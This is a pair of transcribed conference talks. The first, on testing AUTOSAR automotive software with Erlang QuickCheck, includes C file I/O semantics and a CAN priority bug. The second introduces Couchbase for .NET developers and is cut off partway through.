shrinking and we end up with this. This is the test case that we would actually report as revealing the error. You put 11, then you put 0, and then you call get. It fails because the post-condition says that 11 should have been equal to 0 the last thing we put and it's not. Okay. So, that shows you a simple example of shrinking. That's very, very tiny. Let me go instead to the next C code I'm going to test. So this is a very trivial C file. Its purpose is just to give me something to load into AdLang that will make the functions in Stood.io available. The purpose of this is to let me refer to a macro, a hash defined constant. So, when we load C code, we can call functions, but we don't get access to macros and I need C set. It's one of the parameters you have to pass to C. Okay. And here, we have an example of a specification for the file I.O. So I've got, I'm going to use an AdLang record to model the contents of the file. I'm going to keep track of the contents initially empty, the position initially 0. And I'll also need to keep track as I run the test of the file stream after I've opened the file. And we start off just with default values in the initial state. So here's how we specify operations like open. Okay. So, there's a precondition. F open pre is always the precondition for F open. The names are conventional. And that just says, well, you can call open if the stream is currently undefined. And as we haven't opened anything yet. How do we call open? Like this. So we open a file called data.dat. For reading and writing, it's a binary file and the plus means something. I can't remember what. What's the state transition when we open the file? Well, it just returns a new state in which the stream component of the record has been replaced by the result of open. So we save the stream. And that's so that, for example, when we call seek, which we can only do once the stream is not undefined, then we call seek with one argument that is that stream and the other argument that is a random positive number. This is actually the function that we're calling in the test. And it's passing seek set, which is you have to do as the third argument to the C version. The C version is in this file studio.fseek. And what does seek do? Well, it updates the position in the file, as you would expect. So this is a little bit interesting. Notice we update the position no matter what the position is. So you don't have to keep the position within the file. You can have an empty file and set the position to one million bytes in. No problem. What happens then when you write something in that situation? So here's how we generate a write command. This generates a write to the stream with a random list of bytes, char, their signed bytes in C. And this here is the code that's specified. It's the effect of write. It looks kind of scary. But it's not really. So what am I doing? Well, I'm just, first of all, binding contents, the variable contents, to the current contents of the file. Now if you write a position one million when the file is empty, what's supposed to happen is that the file gets zero extended up to that point. So that's what's happening here. I'm saying, well, if the file is already big enough, because I take the position, I add the length of what I'm going to write, and it's less than the contents, that's fine. No extension needed. Otherwise, I have to extend it with zeros so that it becomes long enough. And now the stuff down here is saying, OK, now take the extended model of the file, split it at the position. That gives me the prefix that comes before what I'm going to write and the rest, split the rest of it at the length of the data that I'm writing. That gives me the middle that's going to be overwritten and the post that comes after. So what's the new contents of the file going to be? It's just pre and then L and then post. And the position is going to be after what I've written. OK. So the behavior of write is a little complex, but it's quite easy to specify using list operations and declarative lists in this manner. And then we've got read as well. But I think you'll trust me that I've specified read correctly. Let's run some tests. OK. So I will need to compile the C code. We ignore warnings. And I'll need to compile my specification. And now I can run QuickCheck. Wow. Something didn't work. OK. What happened here? Once again, you can see that the initial random test was quite long. Oh, only seven steps. But still, the smallest failing test is much shorter. And it doesn't fit on the screen, does it? Darn. So what happened? We opened the file, we did a write, and then we did a read. I wrote just a zero. But now there's a zero in the file, but the position is at the end of the file, right? I did a read. And what do you know? I read a zero. What happened? I seem to have read what I just wrote, even though I didn't reposition the file pointer. Any clue what's gone wrong? Well, maybe reading has its own pointer. Is that possible? Let's find out. I'll just modify my spec then. I don't expect to find bugs in the C library, of course. I'm just trying to understand what it does. So let me add a reading position. And then in the specification of read, which is down here, I will replace the position by reading position. And I think I had better change the specification of seek as well, so that, here we are. It updates both positions. Okay. So now, if I recompile my specification, then I can rerun the last test. There's a call for doing that. Just check. And now it passes. Okay. So let's run random tests again. And 100 of them passed. Okay. This didn't happen last time. Okay. Well, that was a surprise because it's the wrong fix. But I will worry about that later. Okay. So, actually, if I now recompile my spec and rerun the test, it still fails. It turns out that you're not allowed to call read directly after write. Before you do a read with these functions, you must call a seek. So let me just add a state here to record whether or not I'm writing. And I will change the model of write so that, as well as updating the contents, it just sets the state to be writing. Now here I have a precondition for read, which says when I'm allowed to call it. So if I say that the state must not be writing, that will then not allow me to call read after a write. And, of course, I need to be able to restore the state so that I can do a read again. And that I will do in the specification of seek so that we will say that, among other things, seek resets the state to undefined. Okay. So if I compile that and rerun my failing test, it still fails, but for a different reason. If you look here, it says now a precondition failed. In other words, this is now not considered a good test because I called read and I should not have done so. So that's fine. Oh, let me run more random tests. And now here we see a different failure. Okay, so what's happened here? I opened the file. I did a seek to position one. I wrote zero bytes. Oh, maybe a little odd, but nevertheless. So that should extend the file, shouldn't it? To be one byte long. Then I did a seek back to the beginning and I tried to read one byte and I got an empty list back. So read failed. Read didn't see any data. So the zero extension didn't happen. And why was that? Well my guess is that it's because I wrote zero bytes. So let me model that. I will just add another clause here saying that if you write zero bytes, the state doesn't change. So notice that write does much more than just write the bytes. It does the zero extension stuff. But none of that seems to happen if you write zero bytes. I suppose it's an optimization. I have not found that documented anywhere though. Okay, so let's recompile that again. Rerun the last test. Now it passes. Run more random tests. Okay, another one failed. Let's see what we get after shrinking. Wow, this one's shrinking a long time. Okay, what happened? We opened the file. We wrote a zero byte. We did a seek back to the beginning. We read one byte and we got zero. That's good. We wrote another zero. Okay, so what should the file contain now? Two zeros, right? We did a seek back to the beginning and we tried to read two bytes. What should we see? Two zeros. What did we see? One zero. So my second right has been thrown away. How come? It turns out that not only must you not read after a write, but you must not write after a read. And that's what happened here. I did a read followed by a write without a seek in between. And you just mustn't do that. It's in the C standard actually. So okay, now I know that. Let me modify right precondition to say that the file state must not be reading. And I'll modify read state transition function, if I can find it, to say that once you do one read, the state becomes reading. And once again, it'll go back to undefined when we do a seek. And now if I recompile that, then that last test is now a bad test. Precondition fails. And if I run random tests, this time they pass and they all two. Okay, so I haven't really found any bugs, but I've learned things I didn't know about the behavior of read, write, and seek in C. So you might very well think, if you're writing C code, that if you just read some bytes from a file, and then you want to write something directly afterwards, that you could optimize your code by leaving out the seek, because you're already in the right place. Right, doesn't that make sense? But you can't do it, because if you do, your right may get lost. Okay, so that shows you what testing C code, at least with QuickCheck is like. And what can we learn from seeing that? Well, one thing we can learn is that one specification of how the code is expected to behave can find many different bugs. So I found several strange behaviors from that one example. And secondly, I hope you agree that those minimal failing tests are relatively easy to debug. So we have been applying this stuff to testing these out-of-sar components. One difference from testing those little programs is that the components are not self-contained. They're always making calls to other components. And so, of course, we have to also generate, we have to mock the other components, and we have to generate the mocked behaviors. So our model of one component will specify not only how to call it and how its call should behave, but also what calls it should make to other components. And so we have a slightly more complex kind of QuickCheck state machine that generates both API calls and mock behavior. Here's a fragment of source code from one of our models that does that. And it looks very like the examples you've already seen. So this specifies how to halt communication in the flex array interface. And it has a precondition that says you can only halt if the control is synchronized and something is initialized. And there's the state transition function that says basically when you halt communication, the state becomes FR pox stake halt. And down at the bottom here, this specifies which call outs we expect to appear and how to mock their results. So we just write an additional function definition for each operation we're specifying that characterizes the mock behavior that we need. And then what we test is that for every sequence of API calls that satisfy our preconditions, all the post conditions must hold. And all the call outs that are actually made must match the mocking specification. Here's one of the bugs we found. This is a bug in a vendor's CAN stack. So on the CAN bus, every message has an identifier. And that identifier also serves as priority for the bus. The lower the number, the higher the priority. So if you've got priority one, then your message should always go over the bus when possible. So in this test case, we first of all asked the CAN stack to send the message with priority one. And we observed a call out that it actually started sending one on the bus. That makes the bus busy. Now nothing else can be sent until that transmission is complete. So then we sent two more messages with priority two and three. They were queued up. And then finally, we made a call of transmission confirmed. That's a call to the CAN stack that is usually made from below. It's made when the bus says, I finished my previous transmission. I'm ready for something else. So what message should the CAN stack send next? The one with priority two. And what message did it send next? The one with priority three. So how could that happen? It turns out it's because the CAN protocol lets you have two different forms of CAN ID. The original protocol only allowed 11 bits for the CAN ID. But that means only 2,000 different message types in the entire car. It's just not enough. So the new version of the protocol allows an extended CAN ID with 29 bits. So that should keep car software developers going for a while. But of course, the protocol still has to support the standard CAN IDs, which means you can have a mixture of the two on the bus. Now when you mix the two, as far as priority is concerned, it's only the value of the identifier that matters. It's not what form it has. But in this software stack, both forms of CAN ID were stored in one unsigned 32-bit integer. Since you need to know what kind of ID it is when you send a message, so you can use either the 11 bits or the 29 bits, they set the top bit to distinguish an extended CAN ID. So what does that mean? It means when you compare IDs to decide which message to send, you must mask off the top bit. And of course, they forgot to do that. Our message with priority two had an extended CAN ID, so it was considered to be 2 to the 31 plus 2, and thus was sent after the message of priority 3. Does this matter? Well, you know, those priorities are there for a reason. Everything talks over the CAN bus in a car. The stereo may talk over it. Your brakes do. You want your brakes to have priority over the stereo. So it's not good if the stack mixes up the priorities. And it was a good thing to find this bug. But the real point that I want to make about this is this is perhaps a very hard bug to find. It's a low-level bug involving failing to mask off a bit in C code. And yet, we can still generate and shrink a short test case, just the sequence of four calls that makes it relatively easy to debug. And that's the experience that we have had again and again and again in testing this out-of-sar code. OK, so what were the challenges, particular challenges, of this project? Well, one of them was that, as I showed you on one of my early slides, the out-of-sar modules or components are gathered into clusters. So all the layers of the protocols are individual components, but they're typically delivered together. And when they're delivered together, the supplier often doesn't even bother to implement the interface between the layers. It's more efficient not to. So the question then is, how are we going to test this stuff? So we started off thinking, well, we'll just write a model for the entire cluster. Nightmare, because in order to figure out what the model was, we would have to read five different PDFs and trace the behavior through from the API called to the top layer down to what's supposed to come out at the bottom. So we managed that with one cluster. We made a model of that sort. And even having done so, it was a nightmare. Because when we found a bug, then the supplier would say, well, show us in the standard why this is a bug. And the standard specifies how each module behaves. So if we had a model that specified the entire cluster, it was much harder to relate it back to the standard and show why a particular test should be considered a failure. So in the end, what we did was we figured out how to specify the component separately and then cluster the models together. And that was quite challenging, but we made it work. So that meant that we could cluster together several models, models of each layer of a protocol, specify them separately, cluster them together, and then test the entire stack. Other challenges. Well, let's focus on those com services for a while. In fact, let's focus on the very top module, the com module. That's the routing module. There you can see the specification, page one of 179. And you know what? It's not even self-contained. The first thing you have to do to try to understand this is to read the older standard, the OSEK com module description. That's another 73 pages. So there was just masses of text to read and understand before we could build these models. So you might think, did we have to do essentially as much work as the implementers? Because we more or less had to represent the entire behavior of the standard as Erlang models. Well, no. Here is a comparison of code sizes between our models in red and the implementations in C for four of those components or four of those clusters. And as you can see, our code is four to six times smaller than the implementation, which is pretty good, pretty good ratio for test code. We were also able to get hold of a standard test suite for the Flex-Ray interface. And we could compare the size of this TTC-N3 test suite with the size of our QuickCheck model. Our code was nine times smaller, and it tests much more. So these are good results. And it's nice that we've been able to use the technique on a large scale project where we can actually have sensible code sizes to compare. Another challenge. How do we know our code is right? So when we run a test of some vendor code against our models and the test fails, what it tells us is that there's a bug in the vendor code or in our model. What we found is an inconsistency between the two. So how do we know where the bug is, whether it's our fault and we should fix the model, or whether it's the vendor's fault? So just as QuickCheck is testing the vendor code, we used the vendor code to test our models. And I think this was really essential. It was essential that we had vendor code available. Because of course, when we write models in QuickCheck, we wrote 20,000 lines of Erdlang to model out of SAR. Of course, it was full of bugs and mistakes. And we would not have been able to find our own mistakes if we hadn't been able to run our code for which we needed vendor code to test. But still, the question is then, how do we know who's correct? Well, it's obvious, right? Read the standard. When that doesn't work, luckily, we could ask Volvo. It was great to have an Oracle who could tell us absolutely not what the standard meant, but what they want. So reading the standard, for example, here's a bit of it. This is from the com document. This is a problem I found. I know it's gobbledygook. So let me just explain. IPDU means channel, and SDU means server. IPDU means channel, and SDU means message. Here's one of the requirements. The first one, in fact. So it says, this particular call, trigger transmit, will return EOK if the message has been copied, and E not OK if the message has not been copied. OK, that's clear enough. Just in case you don't understand it, there's some explanation in the next paragraph. It says, it will return E not OK if a stopped channel is requested. You can stop channels. OK? However, even for stopped channels, it copies the data. Wait a minute. The requirement says, E not OK means no data has been copied. The explanation says, for stopped channels, you get E not OK, and the data has been copied. What's right? Ask Volvo. We've found many of those things, and they've been fed back into the revision of the standard, which is an ongoing process. And so we've led to clearing up a lot of ambiguities there. Here's another problem we run into. I showed you, when we run QuickCheck and a test fails, we get the minimal failing test case. What do you think happens if we run QuickCheck again? Well, it might not, but if the bug appears fairly often, it almost always will. And it's almost always the same minimal failing test. So imagine the situation then. We get a delivery from a vendor. We start testing it. We find one bug, what now? Well, we could report it to the vendor and wait three weeks for them to send a new version, but that's just not productive. We have to find more bugs. So the best way to proceed is, of course, to fix the bug. And then the most probable bug will be a different one. But to do that, you have to have the source code. Sometimes we did. Sometimes we did this. On the other hand, we weren't being paid to fix other people's C code. So it felt a bit frustrating. What else could we do? Unfix the spec. And this is what we had to do all the time. So look, here is a part of one of our models. It's for initial send timer operation. And look, that red stuff. That's an Erlang macro that we could hash define to be true or false. So if COM bug 14 is present, then we initialize the number of ticks wrongly. Otherwise, we do the right thing. If COM bug 27 is present, then we fail to initialize the data in some data structure. So our code ended up full of these things, which we had to do to make progress. So we would have to model the effect of one bug, and then we could find the next one. Far quicker than waiting for suppliers to fix them. But then, of course, we had to deliver specifications to Volvo cars. They didn't want a specification full of a description of all of the different bugs in the vendor code that we had used. So of course, we had to delouse it before sending it to Volvo. And the first time we did that, it was a lot of manual work. Enter Wrangler. Wrangler is a refactoring tool for Erlang. And a very nice property of it is it's scriptable. So we were able to script a delousing refactoring that would just take all those macros, replace them by false, and then apply a number of simplifications to the code. Here's some code before delousing. You can see it's looking to see is can TP bug 5 present? If so, we do one wrong thing. If not, then there's another case in which, if can TP bug 6 is present, then something else goes wrong. There it is after delousing. Turning that from a big manual job into a push button process was really sweet. So what results did we get? Well, we tested code from six different potential suppliers to Volvo. We found more than 200 issues with that code. Now, I say issues. They went all bugs. More than 100 were problems in the standard, like the one that I showed you. So if you've got a problem with that code, so if you've got a standard that is self-contradictory, what are you going to do as an implementer? You have to choose something. And we found many cases in which the implementers had made different choices. And that could, of course, lead to the code not working together when it was integrated. So we've had a lot of problems in the standard. The effect has been a big improvement there. And another 100 or so issues that were simply bugs in the code that might have found its way into your next car. And the certification process is going on as we speak. So I'm very hopeful. Oh, yeah. Let me just tell you. We found a little bit of culture shock on the part of the suppliers when they discovered they were going to face this process. So we were at a one-day meeting that Volvo had called to explain their requirements to the suppliers. And among other things, this was explained. So the suppliers knew that they were going to have to pass tests that we were responsible for. So of course, what did they ask us? Can we get the test suite in advance? And they weren't expecting the answer. No, there is no test suite. We're going to generate millions of tests. And you have to pass every single one. Anyway, I'm very hopeful that the next generation of all those will have at least basic software that has gone through some very rigorous testing. And it feels good to hope that the next generation of cars may be a bit more reliable or safer as a result. OK. We have plenty of time for questions. Do I have a Volvo? Not yet. You found 200 bugs. You wouldn't do that, right? No, no. The bugs are not involved with software. They're in the suppliers. And the suppliers supply all the car manufacturers. So we will have made an improvement in the quality of software in very many cars. But we focused on testing the things that matter to Volvo. So I guess. Yeah. Yeah, indeed. Do other car companies have similar testing? No. We are trying to sell it to them, of course. And I think there are some who are very interested. But they're kind of waiting to see how it works for Volvo. So maybe next year. I've got even better story. The manufacturers of software. They're interested. That varies. So there is one company whom I think probably shouldn't name who have indeed bought licenses. And they're very interested in using the same techniques to test not just the out-of-style basic software, but the other software that they're developing as well. And we're very excited about that. I'm looking forward to helping them. From some of the others, some of them seem to have an attitude that if we say, you could deliver bug-free software. And they'll say, but we make all our money fixing the bugs. So not all the suppliers are as interested as we initially thought in being sure that they're compliant to the standard. I mean, some of them think they know better than the standard. And maybe individually they do. But for integration, that's a problem. How high level of confidence do you have that you've covered in all the possible ways? So we look at, for example, we do look at code coverage of the code under test. But that doesn't really tell you much. There's always dead code in there. And more importantly, we collect a lot of statistics on the test cases that we generate. And so one risk with this kind of testing is that you don't actually see the test cases. So if you make a mistake in a precondition, then maybe some operation will never be called. And it's important to gather statistics and make sure that you're not in one of those bad cases. Also, we've encountered things like maybe something is supposed to happen one second after you do something. Well, in this software, how do you make something happen one second later? One of the components will be responsible for making it happen. And it'll have a main function that is called every five milliseconds. So that means to observe that thing happening, you've got to call that main function 200 times. And you're not very likely to do that in a randomly generated test. So what we have to do is notice that there's a problem there. And then we just add an operation to our tests that says, call that thing n times where n is in the range of 0 to 300 or something. So we do have to think about the test coverage that we're getting. It's not a completely magic wand. But I'm reasonably confident that we've done a good job there. I'm much more confident than I would be if we've been writing individual tests by hand. You probably can't see us. There's two pictures coming in. I can't see at all. Oh, hi. OK, sorry. OK, so why was there an early version that consisted already of the scale version? So I actually started the company because I was a funding agency at the time, encouraged me very strongly to do that. And also, Ericsson were very interested in using the technology themselves. But it was a whole lot easier to make use of an Erlang version of QuickCheck within Ericsson than the Haskell version would have been. Because they were primarily, or to begin with at least, interested in testing Erlang code. And we found some great bugs in Ericsson's products as well. But that was it. We, our first customer, wanted Erlang. So that seemed a good reason. And actually, I think it was quite a good choice. I mean, we had a panel session yesterday that was supposed to be about typing. And there are some things that, I mean, strong typing in Haskell is wonderful in very many situations. But there are one or two things that it makes more difficult, like generic programming, where you want to be able to walk over any kind of data structure, for example. In Erlang QuickCheck, we do that kind of thing all the time. In Erlang, well, in Haskell, you can write a paper about it still. In Erlang, it's four lines of code. So having a dynamic language for this application has worked very well. The downside is that we have to find our type errors by testing. But what do you know? Testing isn't really a problem for us. And so we have not suffered the downside very much either. When you had an opportunity to understand it, it sounded like you were asking mobile for corrections. Does that mean that the standard became mobile besides? No, no. So what would happen is we would identify a problem in the standard. And we'd ask Volvo to help with that. And either they would decide what they wanted, or in most cases, they would push it upwards to the consortium. Because only out-as-are members of a certain status can do that. And Volvo is such a member. So they would push it up often along with a suggested provision. And then that would be discussed and fixed one way or another higher up. I guess this probably means that Volvo have been among the more active contributors who found problems in the standard. And so perhaps they've had more influence than their size would otherwise give them. It seems like in a way maybe you do have typing even in Erling, because what you're dealing with is at the bit syntax level. And so four bits of numbers, little indian, or it's the same however, I guess, right? Is that part of why the type, lack of types, save you is because you're actually dealing with just binary anyway and bit syntax? Or was that not? No, even when we're not using the bit syntax. In many cases, I mean, in this project, we did use the bit syntax quite a bit for specifying the format of the messages on the buses and so on. But even when we don't, I think the typing argument is the same. OK. One more question. I think you might be thinking about it, how do you do exactly cope with real time requirements? Yeah, so this is all real time code. But it's sort of abstract real time code in that the standard says, this function will be called with this frequency, or that's usually something configurable, in fact. So in our tests, what we had to do was make sure that if we call the main function the right number of times, then something happens in the right call. We didn't actually have to measure real time. And indeed, we were running our tests on desktop computers. So real time on the embedded system would be quite different anyway. That's a separate problem that I guess the suppliers in Volvo cope with once they believe the software works otherwise. OK. Well, we're out of questions. And we're also pretty much out of time. So thank you very much for coming to listen. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
|
Modern cars are full of software, with 50-100 processors and tens of millions of lines of code. Increasingly, this software is based on the AUTOSAR standard, drawn up by a consortium including Toyota, Ford, GM, and most of the world's other major car manufacturers. AUTOSAR defines the "basic software" which should run on each processor, providing a standardised environment enabling AUTOSAR applications to be distributed freely around the processors in the car.Such is the theory. In practice, the basic software is supplied by multiple vendors, and follows the standard to a greater or lesser degree. Mixing software from different vendors can lead to unexpected failures as a result. Quviq has been working with Volvo and SP to model AUTOSAR basic software components using Erlang, and test them for compliance using QuickCheck. I'll present some of the challenges and results--which may help make your car more reliable in the future!
|
10.5446/51445 (DOI)
|
Alright, I think we're about to get started. Thanks everyone for coming out. Just a quick check in the audience to see where people are with NoSQL and CouchBase and that sort of genre. How many people have heard of NoSQL before? This is good. A couple of years ago there were very few hands, so obviously it's becoming a little more pervasive. How many people have heard of CouchBase? It's pretty good. CouchDB, MongoDB. So that's sort of the broad range of NoSQL technologies that you've probably encountered. Cassandra might be another one you've encountered. So what I'll do in the beginning of this talk, the talk is really about.NET and CouchBase and writing apps with the.NET client library that I previously supported. And what I'm going to start out with though for those of you who are new to CouchBase is just a quick overview of CouchBase so you can see how it kind of fits in with all those other NoSQL systems. So a little bit about me. I've recently changed positions. I used to work for CouchBase. I was the developer advocate doing the.NET SDK. I decided to kind of take a different path a couple of weeks ago, so I actually worked for a company that's headquartered out here in Europe. Education first. If any of you have been lucky enough to spend a year abroad during high school, you might have gone through our program. I have run the Boston Code Camp. I'm from Boston Mass, so I run the Code Camp out there. Do you guys have Code Camps out here? So the all day, Saturday, Dev events, local community stuff. And if you have any questions for me, you can find me on Twitter at CodeVoyer or you can just find me at johnslablaki.com and there's a link to a form where you can contact me if you have any questions about anything with either CouchBase or NoSQL after this talk. And feel free to drop me a note. So like I said, I'm just going to take about five minutes to cover what CouchBase is and kind of how that, how CouchBase differs from some of the other databases that you may or may not have heard of. But my first question for the audience is how many people have used a dictionary? Not the physical book, the actual. How many people have used Link? So fundamentally it looks like everyone in this room has the background knowledge for working with a database like CouchBase. The concepts from Link are going to key in heavily to the way we do indexing with MapReduce and the concepts from dictionaries are going to obviously play into the key value store aspect of CouchBase. So CouchBase is a hybrid. So a lot of databases kind of, a lot of NoSQL databases tend to fit into one or two, I'm sorry, one bucket only. And that bucket might be a key value store or it might be a document store or a multi-column or some specific genre. But CouchBase is a hybrid database as of 2.0 which came out last December. So CouchBase is both a key value store and a document store. And it's a key value store in that the CRUD operations, the primary CRUD operations are all done through simple key value, simple key value API. Has anyone worked with Memcache D? Is that what it's called now? It used to be Velocity, Microsoft's app fabric, the distributed caching tier on Azure. So it's basically, Memcache D was the original distributed cache across multiple nodes in a cluster of Memcache servers. And CouchBase is fully compatible with Memcache D. So if you've used Memcache D, you understand the primary API for working with CouchBase. But again, if you've worked with the dictionary, you also understand how to work with key value pairs. So it's a very simple API for putting data in and getting data out. It's a little more interesting when you want to create a secondary index. And that's what we're going to talk about later on, basically. So you put everything in by key value, but now you want to find users by last name. And their key is not their last name. So a couple other concepts. So again, everything is done with the key value API. You store documents in a bucket. So if I use the term bucket, think of it as a database. It's not precisely a database, but you can kind of think anywhere in SQL Server where you would have right-clicked new database, you would create a new bucket in CouchBase. And then again, secondary indexes are going to be created using JavaScript, and I'll show you a couple examples of that. So rather than, I'm going to try to minimize how many slides I look at. I want to just actually dig right in. I did call this talk code first, so I want to jump right into some actual simple code. So before I jump into the complete example, I think it's useful to start with the Hello World so you can understand what is this CouchBase thing if you haven't seen it. How many people have actually seen CouchBase? I know a bunch of you have heard of it, but has anyone actually used the product at all? So a lot fewer people. So I'll jump in with a simple Hello World, and then we'll kind of work our way up into a more interesting example. How many people have heard the term code first before? So code first for those of you who haven't heard generally refers to the idea that before you design your schema, you design your business objects, and the business objects become your database schema. Now in Ruby on Rails, it's the active record model where you basically define some active records and then auto-generate the schema. Well, I think with NoSQL, it's an interesting approach because everything is code first. You don't define objects, you don't define a schema. So CouchBase is a schema-less database as we'll see as we go along. There's no definition of a table. There's no definition of something that has a schema. So you define your objects and that's how they get saved. Does anyone feel like that's scary, not having a schema? People don't want to admit it. So I'd ask you to consider things like, okay, so one of the things that really bothers people at first instinctively is there's no schema in this database. How do I control what goes in there? But let me ask a couple of questions. How many people have gotten their schema right in the first try before? Usually at least one person says they have. How many people have denormalized their database to make it perform better? So one thing I like to say about NoSQL, a lot of people look at NoSQL and think it's creating a new class of problems. I like to think that it's creating a new class of solutions. So we don't have new problems. We just have the same problems with different solutions. So you've denormalized that database because that query that joined to 10 tables that were perfectly normalized took 10 minutes to retrieve one row. So NoSQL databases tend to start from the other side. Let's optimize first, not worry about having a table with 10 million rows in a column that's null in 900,000 of them. So that's not artificially impose a schema on our data when it doesn't really have one, or let's not artificially enforce these constraints that really don't perform well. So NoSQL takes the other approach. We need to perform first, and then we'll figure out how to deal with referential integrity and that sort of stuff. And it gets bubbled up to the application in general. This is the other scary part. There's no referential integrity or transactions beyond a single document insert in a NoSQL database. And there are a couple of fringe databases, and fringes aren't to discount them, but they haven't really caught on that are actually ACID compliant. That would be NoSQL databases. But generally speaking, the major players do not support ACID properties. So you don't get cross-insert, cross-update transactions. But a lot of this stuff goes away when you think about some of the common use cases. The way you store your data in a relational database is I insert into five tables because they're normalized versus one document that contains all my data. So that sort of need to have a transaction boundary across a lot of tables goes away because you don't have a lot of tables. So again, a lot of these problems are not new problems. They're just solved in a different way. So now with that said, I'm going to go back to my Hello World example here so we can get a quick view of how I create an instance of the CouchBase client, how I configure it, how I insert a key, and how I read the key. So the most basic operations. So I haven't actually, I think I have internet access that's working right now. This doesn't always work depending on the venue. So I'm going to look for the CouchBaseNet client. Does everyone use NuGet? Does anyone not use NuGet in the room? So if you haven't used NuGet, it's a package manager for downloading assemblies and Visual Studio into your project. So basically a reference manager. Oh, yes, that would, let me, I don't need my slides anymore, sorry. Oops, there we go. Can everyone see that okay now? So I'm going to search for the CouchBaseNet client, which is the official SDK. I'm in my installed packages, let me go to online here. There is a second CouchBaseNet client that is an older version. I don't know why NuGet is keeping that up there twice. I've removed this one as far as I know, but 1.26 is the most recent version. And it supports.NET 3.5 and 4.0. So now that I've added that reference, what I get is a reference to three different assemblies. The only dependency that the CouchBaseNet client has is JSON.NET, which pretty much everything has a dependency on. Previous versions had a dependency on Rust Sharp and Hamac, and those are no longer there. Oops, that wasn't right. So you can see this, that's my magnifier in the way, of course, Enium.caching. If you've used memcached.net, you've used enium.caching. This is basically where most of the functionality exists inside of the CouchBase driver, and that is a fork of the original enium.caching. So if you encounter anything out in the wild that's enium with CouchBase, there is a particular fork that ships with a CouchBase client, not the actual enium.caching. And then the CouchBaseAssembly is the other one that has all of the CouchBase specific wrappers around the enium stuff. So now, once you have those references, you can either configure the client in code or configure it in app config. I prefer code. I think more and more I've seen as I've gone out into the wild, people do prefer code configuration. So there's a class called the CouchBaseClientConfiguration, and the minimum configuration you need is a Bootstrap URL, and I'll explain this in just a second. So when the CouchBaseClient initializes, what it does, and this is unlike other NoSQL and SQL databases, so what it does is the CouchBaseClient starts up, it spins a thread that goes and listens to a streaming HTTP connection. So basically the cluster, the CouchBase cluster, which is just a bunch of CouchBase nodes that are acting as peers, it connects to one of those nodes which sends down topology updates. So the actual client that's running in your application space knows about the topology of the cluster. So cryptographically it hashes each key that you set for a value, and it sends it to a particular server. So as you add nodes and remove nodes, the client knows how to go directly to the right server. So it maintains a map. There's actually a layer of abstraction in between the client and those keys and how they're mapped, so that's a much more finite because you wouldn't want to have a map with millions and millions of keys potentially on the client. But the client always knows how to go right to the right server that owns the key. So in a CouchBase cluster, the nodes are all peers except one of the nodes owns the key as a master. So the key can be replicated up to three times on other nodes, but it's only on one node as a primary key. I'm not primary key in the obviously SQL sense, but it lives as a master instance of that key and that way CouchBase is consistent. There's different types of consistency levels for no SQL databases. Some databases are called eventually consistent. Has anyone heard that term before? So eventually consistent, kind of the common analogy or the common example is the DNS system. You can update your DNS record, but that DNS record has to propagate to the other nodes in the DNS system before all requests see the most recent update. CouchBase is consistent because when you say get by this key, only one server in the cluster can answer that question versus other databases where Cassandra is eventually consistent. It's tunable. You can force consistency a little bit more. But basically what happens is when you request from an eventually consistent database, you could get a dirty read. You cannot get a dirty read with CouchBase. Hopefully you can, but the.NET SDK doesn't expose the replica reads, which is how you would do that. Sure. So the question was about the failover scenario. And what happens is, so assuming that you've replicated your nodes, replicated to another node, at least two nodes, there's an election of one of those servers to become the new master for that key, and then the server rebalances the keys. So the keys, another thing I'll mention about the keys is they're auto-sharded. Is anyone not familiar with the term sharding? So sharding meaning distributing keys across a number of nodes in your system. So you can shard a SQL table so that you basically spread the rows across many nodes in a cluster. So sharding in MongoDB, for example, was kind of controversial because famously, sorry, Foursquare picked the wrong shard key, kind of overloaded some set of their shards, and that kind of brought Foursquare down. This is many years ago. This isn't like a recent thing, but it kind of was a classic example of why sharding is hard because you can't predict that first names are going to distribute, or last names are going to distribute evenly across your data, versus a cryptographically hashed key in your key value pair. It's pretty safe that you're going to get, if you have a three node cluster and 100 keys, you're going to have about 33 on each node. So you can easily, you can almost guarantee that with Couchbase, if you have n number of nodes, you're going to have even distribution across the n nodes for your keys. And you don't have to do any kind of predicting because it's all done automatically. So that's the bootstrap URL. So there's basically like a JSON handshake that happens when the client starts up, it gets a JSON response. It reads it, gets an X URL to go to to get a little more information, and then it kind of goes through that once or twice. Because of that, you don't want to create multiple instances of your Couchbase client. It's not the typical database pattern where it's using connection equals new connection and starting over. You're going to end up kind of read handshaking every time. So that does mean that you have to have a stateful client. Generally speaking, you keep a static member somewhere that you reuse throughout your application. There's also a socket pool. So it's not that there's, you can fine tune how many connections are in the socket pool. So basically it'll maintain by default a set of 10 connections to your cluster, to each node in your cluster. The other thing you need to tell Couchbase is which bucket to connect to. So again, buckets are databases. They're analogous to databases. So there's a default bucket that's installed when you run through the wizard and install Couchbase. So it's just an off list. So the off model in Couchbase is SASL. So it's just basically, if you've used, it's a simple binary protocol. It's not encrypting anything. It's not user defined object level security. It's just, I have a bucket. I can either put a password on it or I don't. The username is the name of the bucket. You can set a password on the bucket. And that's, again, that's not unique to Couchbase. Most node SQL databases don't have granular security. You may have object, like database level users, and you may have read only versus write accessible. But generally speaking, no SQL databases do not have the same security model as yet as SQL databases. So now that I have my configuration, I can create a new client. So it's the classes Couchbase client. And if you use the parameter list constructor, the client will expect that you have an app config section defined for Couchbase. Or I can just pass my config instance. So now we'll ignore return values for now and assume everything's going to work because this is the Hello World example. So I'm going to create a message. Equals. Did I get that right? Was that right? Close enough. And so then I'm going to save that message. So the store method is the basic method for doing ads updates and replaces. There are three types of ads in Couchbase. Three types of stores in Couchbase. You can add, which does an insert. It'll fail if the key exists. Replace does an update. It'll fail if the key doesn't exist. Or a set, which is basically like a save, which does an insert if it doesn't exist or an update if it does exist. So add is useful. Generally speaking, I usually use just the set mode. So generally, if you have things that you want to fail, like creating a user based on the email address and you want the user property, whatever to be unique, add is a way of guaranteeing that. And you get a status back that says the key exists or something to that effect. So you can kind of check to make sure that you are ensuring uniqueness and getting the proper behavior. So I'm going to set the store mode to set the key to message and the value to message. So it's slightly more complicated than a hash table because I have to set the store mode. The other SDKs, the Java, Ruby and everything else, they don't have this idea of a store mode. They have straight methods that are set, replaced and add. This is an artifact of the enum.caching library. I personally would, at some point, would like to see three unique methods there. So then we'll make sure that it worked by getting the value back. So the key is message. So when I set it, I set it with a key. When I get it, I get it with a key. And if all worked, I should get my almost no region hello world. So any questions on the very basics of hello there then? I'm trying. I feel like because I'm reasonably tall and mostly blonde, I've been mistaken for no region quite a bit since I've been here. So now I want to move on to a more interesting example, which will kind of walk through a full crud application, some of the more advanced usages and basically just show how 